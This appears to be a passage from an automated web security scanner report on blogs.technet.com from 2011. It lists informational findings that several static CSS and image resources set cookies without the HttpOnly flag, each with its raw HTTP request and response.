15.117. http://blogs.technet.com/themes/TechNet/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/TechNet/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/TechNet/favicon.ico HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a46%3a00+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/x-icon
Last-Modified: Thu, 27 Jan 2011 20:42:09 GMT
Accept-Ranges: bytes
ETag: "dc9ec2aa62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a24%3a37+GMT; expires=Sun, 25-Mar-2012 01:24:37 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:46:31 GMT
Content-Length: 894

..............h.......(....... .....................................................................................................................................zbL.kW......aF,.............q_aF,...
...[SNIP]...
15.118. http://blogs.technet.com/themes/blogs/TechNet/css/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/blogs/TechNet/css/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/blogs/TechNet/css/DynamicStyle.aspx?WeblogID=6258&PreviewKey=0 HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/css; charset=utf-8
Expires: Sat, 26 Mar 2011 02:15:39 GMT
Last-Modified: Sat, 26 Mar 2011 01:45:39 GMT
ETag: 634367007395450825
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a39+GMT; expires=Sun, 25-Mar-2012 01:45:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:38 GMT
Content-Length: 2974

#title {
background-image: url("http://blogs.technet.com/photos/mmpcblog/images/3200444/original.aspx");

background-position: left center;
font-family: Calibri, Tahoma, Verdana, sans-serif;
heig
...[SNIP]...
15.119. http://blogs.technet.com/themes/blogs/TechNet/css/technetblogs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/blogs/TechNet/css/technetblogs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/blogs/TechNet/css/technetblogs.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:41:56 GMT
Accept-Ranges: bytes
ETag: "082f1a262becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT; expires=Sun, 25-Mar-2012 01:20:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:38 GMT
Content-Length: 9481

...@import url('../../../technet/css/technet.css');
.header-fragment.user-welcome-without-login a {
   font-weight:normal;
}
.header-fragments a, .header-fragments a:link, .header-fragments a:visite
...[SNIP]...
15.120. http://blogs.technet.com/themes/blogs/TechNet/images/group-nav-sep.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/blogs/TechNet/images/group-nav-sep.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/blogs/TechNet/images/group-nav-sep.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:43:44 GMT
Accept-Ranges: bytes
ETag: "9c7fbee362becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a21%3a39+GMT; expires=Sun, 25-Mar-2012 01:21:39 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:56 GMT
Content-Length: 123

.PNG
.
...IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b....2...........8I.....$..bE......IEND.B`.
15.121. http://blogs.technet.com/themes/generic/css/layout.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/generic/css/layout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/generic/css/layout.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:47 GMT
Accept-Ranges: bytes
ETag: "807d57c162becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a27%3a52+GMT; expires=Sun, 25-Mar-2012 01:27:52 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:38 GMT
Content-Length: 14802

....page-management-header { }
.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-co
...[SNIP]...
15.122. http://blogs.technet.com/themes/groups/TechNet/css/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/groups/TechNet/css/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/groups/TechNet/css/DynamicStyle.aspx?WeblogID=6258&AppType=Weblog&PreviewKey=0 HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a38+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: public
Expires: Sat, 26 Mar 2011 02:15:39 GMT
Last-Modified: Sat, 26 Mar 2011 01:45:39 GMT
ETag: 634367007395294610
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a39+GMT; expires=Sun, 25-Mar-2012 01:45:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:38 GMT
Content-Length: 0

15.123. http://blogs.technet.com/themes/technet/css/technet.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/css/technet.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/css/technet.css HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Wed%2c+23+Mar+2011+04%3a54%3a30+GMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a26+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:43:52 GMT
Accept-Ranges: bytes
ETag: "0b415e862becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a19%3a46+GMT; expires=Sun, 25-Mar-2012 01:19:46 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:40 GMT
Content-Length: 77781

...body, html {
   font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif;
   background:#fff url('../images/technet/technet-body.png') repeat-x;
   color:#333333;
}
h2, h3, h4
...[SNIP]...
15.124. http://blogs.technet.com/themes/technet/images/technet/layout-background.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/images/technet/layout-background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/images/technet/layout-background.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:43:56 GMT
Accept-Ranges: bytes
ETag: "f466f6ea62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a19%3a47+GMT; expires=Sun, 25-Mar-2012 01:19:47 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:56 GMT
Content-Length: 579

.PNG
.
...IHDR.............5oq.....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.01/13/10.d[.....IDATx...Aj.1....B.......z....h
ab..../..M .D.%..OJ..
...[SNIP]...
15.125. http://blogs.technet.com/themes/technet/images/technet/layout-footer.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/images/technet/layout-footer.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/images/technet/layout-footer.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:43:56 GMT
Accept-Ranges: bytes
ETag: "bef1f5ea62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a19%3a48+GMT; expires=Sun, 25-Mar-2012 01:19:48 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:59 GMT
Content-Length: 378

.PNG
.
...IHDR..............-......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...[
.0.@.....q.{s    ...R    ...E.s`h......sJiSf...W.qH.."..M9g...O(;sW..2.2.z........_0........Z....]....M.M..S/c..v.5..f=.].
...[SNIP]...
15.126. http://blogs.technet.com/themes/technet/images/technet/microsoft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/images/technet/microsoft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/images/technet/microsoft.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:56 GMT
Accept-Ranges: bytes
ETag: "53253eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a19%3a48+GMT; expires=Sun, 25-Mar-2012 01:19:48 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:59 GMT
Content-Length: 1037

GIF89av............sss333......ZZZ.........JJJ......)))............:::fff......!!!......{{{kkkRRR...BBB.................................................................................................
...[SNIP]...
15.127. http://blogs.technet.com/themes/technet/images/technet/search.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/images/technet/search.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/images/technet/search.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:43:56 GMT
Accept-Ranges: bytes
ETag: "ee5f3eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a19%3a47+GMT; expires=Sun, 25-Mar-2012 01:19:47 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:59 GMT
Content-Length: 1027

.PNG
.
...IHDR...6.........pm.[....sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.01/13/10.d[....[IDATx...Mh.e....f.%[.!.|KW,6....E...b.T.R.....lo...
...[SNIP]...
15.128. http://blogs.technet.com/themes/technet/images/technet/technet-body.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/images/technet/technet-body.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/images/technet/technet-body.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:43:56 GMT
Accept-Ranges: bytes
ETag: "fff18eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a19%3a46+GMT; expires=Sun, 25-Mar-2012 01:19:46 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:49 GMT
Content-Length: 1722

.PNG
.
...IHDR.............[.......sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.01/13/10.d[.....IDATh..Y.q.6..8|I.i(........y.....>_<v.9i.N6D.r..d..
...[SNIP]...
15.129. http://blogs.technet.com/themes/technet/images/technet/widget-left.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/images/technet/widget-left.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/images/technet/widget-left.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:43:57 GMT
Accept-Ranges: bytes
ETag: "1af112eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a53+GMT; expires=Sun, 25-Mar-2012 01:20:53 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:58 GMT
Content-Length: 220

.PNG
.
